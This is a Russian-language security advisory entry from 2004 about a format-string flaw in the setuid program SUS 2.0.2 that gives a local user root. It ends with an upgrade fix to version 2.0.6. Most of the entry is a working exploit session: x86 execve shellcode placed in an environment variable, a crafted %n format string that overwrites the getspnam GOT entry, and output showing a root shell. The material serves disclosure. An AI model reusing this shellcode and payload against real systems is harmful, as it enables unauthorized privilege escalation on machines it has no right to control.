Дата публикации: | 16.09.2004 |
Всего просмотров: | 1054 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: SUS 2.0.2
Описание: Уязвимость форматной строки обнаружена в SUS . Локальный пользователь может получить root привилегии на системе. Локальный пользователь может представить специально обработанный параметр командной строки, чтобы выполнить произвольный код с root привилегиями. Уязвимость связанна с некорректным вызовов syslog() в функции log() в 'log.c'. Пример/Эксплоит: getspnam() address -> 08061780 HACK variable address -> 0xbffffb54 [root@laptop root]# objdump -R /usr/bin/sus | grep getspnam 08061780 R_386_JUMP_SLOT getspnam [root@laptop root]# su ljuranic [ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53 \x89\xe1\xcd\x80"'` [ljuranic@laptop ljuranic]$ ./env HACK bffffb54 [ljuranic@laptop ljuranic]$ id uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic) [ljuranic@laptop ljuranic]$ sus -V Version 2.0.2 [ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus -rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus [ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06 \x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259 \\$n%.192u%260\\$n"'` sh-2.05a# id uid=0(root) gid=0(root) groups=0(root) sh-2.05a# URL производителя: http://pdg.uow.edu.au/sus/ Решение:Установите обновленную версию программы: http://pdg.uow.edu.au/sus/sus-2.0.6.tar.Z |
|
Ссылки: | SUS 2.0.2 local root vulnerability |